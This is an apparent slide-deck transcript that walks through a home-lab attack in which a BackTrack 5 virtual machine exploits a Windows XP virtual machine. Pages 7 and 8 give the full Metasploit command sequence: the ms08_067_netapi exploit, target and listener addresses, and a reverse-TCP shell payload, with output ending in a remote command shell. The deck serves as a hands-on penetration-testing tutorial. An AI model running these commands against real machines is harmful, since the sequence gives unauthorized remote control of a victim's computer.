Backtrack 5

11
BACKTRACK 5 …LEARN TO CONFIG AND RUN COMMANDS TO PENETRATE A XP MACHINE

description

the easy way to see what is BACKTRACK?....WHAT IS IT MEANT FOR......?How do we attack a XP machine?....with screen shots and source of download detail!!!!

Transcript of Backtrack 5

Page 1: Backtrack 5

BACKTRACK 5

…LEARN TO CONFIG AND RUN COMMANDS TO PENETRATE A XP MACHINE

Page 2: Backtrack 5

FIRSTLY……

• DOWNLOAD BACKTRACK vmx format FROM @

http://www.backtrack-linux.org/downloads/

Page 3: Backtrack 5

SECONDLY……….

• Run VMWARE and load xp machine and the backtrack vmx machine.

• In this VM lab…the XP machine terminal is attacked by the BT terminal

Page 4: Backtrack 5

THIRDLY…….config IP address to BT machine

Here the IP configured is 80.0.2.251

Page 5: Backtrack 5

FOURTHLY…….config IP address to XP machine

Here the IP configured is 80.0.2.252

Page 6: Backtrack 5

FIFTHLY………..

• NOW JUST TO MAKE A SMALL CHECK OFCONNECTIONS…..DO THE BRIDGING AND PINGBOTH THE MACHINES FROM BOTH TERMINALS

Page 7: Backtrack 5

SIXTHLY…..run the following on the BT terminal

• root@bt:~# cd /pentest/exploits/framework3

• root@bt:/pentest/exploits/framework3#

• root@bt:/pentest/exploits/framework3# ./msfconsole

• o 8 o o

• 8 8 8

• ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P

• 8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8

• 8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8

• 8 8 8 ̀ Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8

• ..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:

• ::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::

• ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

• =[ metasploit v3.7.0-release [core:3.7 api:1.0]

• + -- --=[ 684 exploits - 355 auxiliary

• + -- --=[ 217 payloads - 27 encoders - 8 nops

• =[ svn r12536 updated 169 days ago (2011.05.04)

• Warning: This copy of the Metasploit Framework was last updated 169 days ago.

• We recommend that you update the framework at least every other day.

• For information on updating your copy of Metasploit, please see:

• http://www.metasploit.com/redmine/projects/framework/wiki/Updating

• msf >

RED DENOTES THECOMMANDS TO BETYPED….minimal!!!!

Page 8: Backtrack 5

• msf >

• msf > use exploit/windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > set RHOST 80.0.2.252

• RHOST => 80.0.2.252

• msf exploit(ms08_067_netapi) > set LHOST 80.0.2.251

• LHOST => 80.0.2.251

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp

• PAYLOAD => windows/shell/reverse_tcp

• msf exploit(ms08_067_netapi) > exploit

• [*] Started reverse handler on 80.0.2.251:4444

• [*] Automatically detecting the target...

• [*] Fingerprint: Windows XP - Service Pack 3 - lang:English

• [*] Selected Target: Windows XP SP3 English (NX)

• [*] Attempting to trigger the vulnerability...

• [*] Sending stage (240 bytes) to 80.0.2.252

• [*] Command shell session 1 opened (80.0.2.251:4444 -> 80.0.2.252:1133) at 2011-10-20 05:15:55 -0400

• Microsoft Windows XP [Version 5.1.2600]

• (C) Copyright 1985-2001 Microsoft Corp.

• C:\WINDOWS\system32> u r done!!!!!!!!!!!!!!!!!!

RED DENOTES THECOMMANDS TO BETYPED….minimal!!!!

Page 9: Backtrack 5
Page 10: Backtrack 5
Page 11: Backtrack 5

• Any questions????

…please message or mail at [email protected]